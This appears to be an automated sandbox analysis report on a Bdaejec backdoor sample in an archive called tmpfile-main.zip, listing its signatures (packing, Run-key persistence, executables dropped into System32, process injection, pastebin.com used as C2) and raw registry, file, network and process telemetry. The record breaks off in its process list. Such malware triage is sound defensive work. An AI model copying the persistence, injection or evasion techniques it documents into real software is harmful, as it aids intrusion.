Analysis Overview
SHA256
d6c2f953a4c4b2f7bf58378855bbc3d38c1b4d686118ad899540e5778413788d
Threat Level: Known bad
The file tmpfile-main.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Bdaejec family
Detects Bdaejec Backdoor.
Bdaejec
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Sets service image path in registry
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Checks BIOS information in registry
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Themida packer
ASPack v2.12-2.42
VMProtect packed file
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-02 16:10
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
158s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1704 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1704 set thread context of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DFC104D" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733155995" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96D533AC-157F-4C60-9416-4DFFA36B90DD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DFC104D" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:18 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = [binary value omitted] | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
